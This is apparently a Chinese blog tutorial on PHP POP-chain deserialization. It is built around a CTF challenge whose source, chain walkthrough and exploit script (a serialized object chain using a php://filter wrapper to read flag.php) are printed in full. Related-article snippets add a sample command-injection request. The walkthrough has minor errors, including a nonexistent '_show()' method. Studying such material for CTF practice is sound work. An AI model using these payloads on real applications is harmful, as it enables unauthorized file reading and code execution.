ctf-pop链

最新推荐文章于 2024-10-18 19:55:45 发布
最新推荐文章于 2024-10-18 19:55:45 发布
阅读量2.1k 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32445755/article/details/124788110

POP链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。

__sleep() //使用serialize时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__invoke() //当脚本尝试将对象调用为函数时触发

代码 

<?php

echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/

首先这里传入数据的入口是反序列化,那就是__wakeup(),出口那就是要读取文件,那就是 __invoke()和_show() ,一个是魔法方法,一个是普通方法。 

1.首先看到unserialize($_GET['wish'])将get传参的wish进行了反序列化操作。那么将会调用到Road_is_Long类中__weakup方法。
2.因为 $this->page = "index.php" page被当做字符串所以调用Road_is_Long类中的__to string.
3. ** return $this->string->page ** page属性不存在所以调用Road_is_Long类中的 get方法。
4. ** $function = $this->effort;
return $function(); **
把取出来的effort当做还是调用因此又会引起调用了 Try_Work_Hard类中的__invoke方法,其中就可以把文件读取出来了。

exp

<?php

class Try_Work_Hard{
    protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    } 
}

class Road_is_Long{
    public $page;
    public $string;
    }
class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
} 
$a = new Road_is_Long();
$b=new Road_is_Long();
$c=new Make_a_Change();
$d=new Try_Work_Hard();
$a->page=$b;
$b->string=$c;
$c->effort=$d;
echo urlencode(serialize($a));


?>

 

 

CTF笔记 [SWPUCTF 2021 新生赛]pop
qq_51248658的博客
10-28 3339
这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条子,利用这条子将对象联系起来去拿flag。
PWN学习,对CTF-wiki上的讲解进行一些补充
qq_33948522的博客
06-27 6078
`基本知识 ROP Return Oriented Programming,其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 一般的栈结构: 高地址 +-----------------+ ...
CTF里WEB题中的POP
dangejinghong的博客
09-03 786
当这个php代码开始走的时候,先是__destruct()魔术方法被触发,然后echo出句子,当进行到。发现它调用了一个make_friends方法,但是这个方法不存在,所以触发call()魔术方法,在。__set_state(),调用var_export()导出类时,此静态方法会被调用。那么我们继续走,当进行isset()魔术方法时,echo出它的句子,然后发现其。__isset(),当对不可访问属性调用isset()或empty()时调用。__invoke(),调用函数的方式调用一个对象时的回应方法。
CTF-PHP反序列化漏洞4-实例理解POP(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 3335
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
CTF-PHP反序列化漏洞3-构造POP
Eason_LYC安全白帽子的成长博客
05-08 2374
PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
PHP反序列化--简单ctf--pop(thinkphp5.1.X)漏洞复现
cainiao17441898的博客
07-07 4954
前言: PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法,这些都是PHP内置的方法。 __construct 当一个对象创建时被调用 __destruct 当一个对象销毁时被调用 __wakeup() 使用unserialize时触发 __sleep() 使用serialize时触发 __call() 在对象上下文中调用不可访问的方法时触发 __callStatic() 在静态上下文中调用不可访问的方法时触发 __get() 用于从不可访问的属性读取数据 __set() 用于将数据写入不可访
ROP;CTF-pwn 详解writeup;one_gadget使用;静态库;静态
CHERRY_cong的博客
05-01 1467
ropme_writeup 文章目录ropme_writeup任务描述检查保护观察栈溢出地址实现系统调用ROPgadget任务一思路open(file,O_RDWR)read(4,addr,32)write(1,addr,32)exp1.py任务一运行截图任务二思路exp2.py任务二运行截图 任务描述 本实验提供了一个带有漏洞的二进制程序(ropme),这个二进制程序将你提供的文件名作为参数传入以后就会发生一个栈缓冲区溢出。请使用ROP方法编写利用,在不需要额外操作标准输入的情况下,完成以下至少一项任务
CTF-WEB_ctf代码(1)
2401_84297035的博客
04-28 759
*在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。> **但是此时浏览器渲染的%00可以直接手动换为具体的字符串,或者在菜鸟工具里面把最后一行加个urlencode()函数编码,直接编码为url,避免在序列化内容过多的时候手动该%00过于麻烦,但是此时就需要在一堆编码里面准确的找到类的个数是哪个,一般来说类的个数处于两个冒号之间,冒号的url编码是%3A,所以找到偏前面一点的,在两个%3A之间的数字改大一点就可以了****一个人可以走的很快,但一群人才能走的更远!
CTF-WiKi堆溢出--pwngdb原理讲解
QX_XDE的博客
10-18 1282
利用pwngdb讲解堆溢出是如何产生以及利用的
CTF--攻防世界crypto新手训练7-11
qq_40730029的博客
05-06 1849
7.不仅仅是Morse 8.easy_RSA 9.easychallenge 10.混合编码 11.转轮机加密 7.不仅仅是Morse 题目:“这个题目和我们刚刚做的那个好像啊但是为什么按照刚刚的方法做出来答案却不对呢” ,你奇怪的问了问小鱼,“可能是因为还有一些奇怪的加密方式在里面吧,我们在仔细观察观察”。两个人 安安静静的坐下来开始思考,很耐心的把自己可以想到的加密方式一种种的过了一遍,十多...
php反序列化——pop构造[SWPUCTF 2021 新生赛]pop [NISACTF 2022]babyserialize
m0_73756016的博客
03-27 1085
class w44m中的Getflag() -> class w33m中的__toString() -> class w22m中的 __destruct()$this->mw00->{$this->w22m}();的意思是调用当前对象的 w00m 属性中名为 $this->w22m 的方法。所以反推法第一步就是要调用Getflag()函数 找到$this->w00m->{$this->w22m}();mw00=w44m w22m = Getflag()即可调用Getflag()这题的条是(反推)
pop详细分析、构造(以[NISACTF 2022]babyserialize为例)
2401_82985722的博客
06-18 1423
传入发现只有提示flag在根目录,可直接使用system("cat /flag");在所有类中找,发现huang调用了fun,但在Ilovetxw类里不存在参数 fun。找到eval()函数,可以利用参数txw4ever,调用系统函数system等实现。故在所有类中找,去找类似$a()的对象函数,发现$bb(),它对应的参数是su。2.实例化类Ilovetxw赋值给b,从中调用参数su传入NISA类。,由于fun属性为private,故直接在类里面修改。在所有类中找,发现nisa(),该类中不存在方法。
BMZCTF simple_pop
qq_26243045的博客
11-28 433
考点:反序列化 打开题目发现如下代码 PHP伪协议的考点,需要先去读取useless.php 得到源码 <?php class Modifier { protected $var; public function append($value){ include($value);//flag.php } public function __invoke(){ $this->append($this->va
[MRCTF2020]Ezpop--序列化pop
cainiao17441898的博客
08-15 318
Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected $var; public
php反序列化中的pop
2401_82388450的博客
06-03 1453
在反序列化中,我们能控制的数据就是对象中的属性值(成员变量),所以在php反序列化中有一种漏洞利用方法叫“面向属性编程”,即pop(property oriented programming)。PHP反序列化_在线反序列化-CSDN博客pop就是利用魔术方法在里面进行多次跳转然后获取敏感数据的一种playload.1.构造pop,需要先分析代码2.找到pop的开端,再使用反推法,一个一个魔术方法的绕过3.能够理解魔术方法的触发条件。
POP挖掘
萍水间人的小天地
02-19 335
Laravel mockery组件 exp: <?php namespace Illuminate\Broadcasting{ class PendingBroadcast { protected $event; protected $events; public function __construct($events,$event) ...
pop例题
zhhhb1005的博客
05-01 968
目录 例题 流程 exp pop就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 例题 Happy New Year~ MAKE A WISH <?php echo 'Happy New Year~ MAKE A WISH<br>'; if(isset($_GET['wish'...
[SWPUCTF 2021 新生赛]pop
qq_62046696的博客
05-20 1906
本来该期末考试了放弃看pop表了,可是突然看着看着就通透了,那就赶紧记录下来,万一忘记了呢。 <?php error_reporting(0); show_source("index.php"); class w44m{ private $admin = 'aaa'; protected $passwd = '123456'; public function Getflag(){ if($this->admin === 'w44m' &amp
ctf web pop
最新发布
02-09
### CTF Web 类目中的 Pop Challenge 解析 在CTF竞赛中,“Pop”通常指的是获取目标系统的shell访问权限,这可以是通过各种漏洞利用实现的。对于Web类目的挑战而言,`pop_master`案例提供了一个具体的实例[^1]。 #### pop_master 挑战解析 此部分涉及名为 `pop_master` 的具体挑战,在该挑战中参与者需面对一系列复杂的攻击面来尝试获得服务器端控制权。题目描述指出存在某种机制允许远程代码执行的可能性,而解题思路则围绕着发现并利用这一特性展开。 为了成功完成此类任务,参赛者往往需要: - **识别潜在入口点**:寻找应用程序逻辑错误、未受保护的功能接口或是配置失误之处。 - **构建有效载荷(Payload)**:设计能够突破现有防护措施的有效载荷,比如绕过输入验证或过滤规则等技术手段[^3]。 - **测试与调整**:不断迭代优化自己的方法直至找到可行路径达成最终目标——即“弹出盒子”,意味着取得了预期级别的交互式会话或者更高层次的操作权限。 ```python import requests # 假设已知某参数可被用于RCE, 下列代码仅为示意如何发送恶意请求 url = "http://example.com/vulnerable_endpoint" payload = {'cmd': 'whoami'} # 这里应替换为实际可用的命令字符串 response = requests.post(url, data=payload) print(response.text) ``` 上述Python脚本展示了向可能存在命令注入风险的服务发起POST请求的方式;当然真实环境中还需考虑更多因素如编码转换、字符集处理等问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qq_1136014935

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值